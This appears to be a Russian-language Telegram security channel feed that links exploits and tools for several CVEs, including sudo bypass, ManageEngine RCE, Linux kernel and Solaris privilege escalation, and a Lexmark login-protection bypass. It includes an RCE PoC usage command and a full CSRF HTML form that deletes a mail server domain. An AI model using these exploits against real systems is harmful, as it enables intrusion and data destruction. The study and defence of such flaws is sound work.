CVE-2023-22809 - опять Sudo, опять bypass😏

#Unix #linux #sudo #bypass

CVE-2022-47966
*
Список ПО от ManageEngine подверженных атаке поражает !
*
Уязвимость позволяет удаленное выполнение кода, отправив HTTP-запрос POST, содержащий вредоносный ответ SAML. А всё из за не патченной версии Apache Santuario для проверки подписи XML.
*
read
*
POC/exploit
*
Usage:
python3 CVE-2022-47966.py --url https://10.0.40.64:8080/SamlResponseServlet --command notepad.exe

Чаты и каналы Telegram по информационной безопасности 2023
Хорошая подборочка over 100, но нас в ней нет ((
Забираем

SUDO KILLER
Тулза для выявления и использования неправильных конфигураций и уязвимостей правил sudo для повышения привилегий Linux.

download

Exploiting null-dereferences in the Linux kernel
Интересное

#linux #kernel

В продолжении темы
Появился nuclei-template для дыры CVE-2022-47966.yaml
Ну и сам nuclei забрать тут
****
Bonus для blueTeam - правило обнаружения эксплуатации дыры для Sigma - забрать

Wolfenstein 3D CGA
Тут и описание то не нужно. забрать

#wolf #90

Если я пойду и долиною смертной тени, не убоюсь зла, потому что Ты со мной openAI;
Твой жезл и Твой посох - они успокаивают меня. Ты приготовил предо мною трапезу в виду врагов моих; умастил елеем голову мою; чаша моя преисполнена.

BOT off как вы поняли

RDP
Asynchronous RDP client for Python (headless)
*
Ну Вы понимаете, да ? )))
подобрать

Коннектимся!

Microsoft Teams - RCE
download

CVE-2023-0179 PoC
эксплойт для уязвимости в Nftables, затрагивающий все версии Linux от 5.5 до 6.2-rc3, хотя эксплойт тестировался на свежем ядре 6.1.6
Понять глубину

#linux #kernel #lpe #nftables

переоформим !

CVE-2023-0398 modoboa - mail Server

CSRF приводит к удалению домена
*
usage fot BURP:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <noscript>history.pushState('', '', '/')</noscript>
    <form action="http://127.0.0.1:8000/admin/domains/4/delete/">
      <input type="submit" value="Submit request" />
    </form>
    <noscript>
      document.forms[0].submit();
    </noscript>
  </body>
</html>

read

For BurpSuite
APIKit：Discovery, Scan and Audit APIs Toolkit All In One.
download

#Burp #plugins

Это может быть интересно
ADReplStatus
*
Active Directory Replication Status Tool, aka ADREPLSTATUS - 2023
download

LPE - Solaris 10
Злоупотребление в dtprintinfo
*
Есть такой ресёрчер Marco Ivaldi (дохлая корова) который шлепает сплоиты с бородатого 2000 года, хоть соляру сейчас найти сложно, но все равно красиво

exploit

Фу, блин, Но POC есть POC
CVE-2023-22960
Обод механизма предотвращения подбора учетных данных встроенного веб-сервера (интерфейса) более чем 60 моделей принтеров Lexmark.
*
Фор Даунлоаде зысис щит, фолоу ту зэ линк, май френд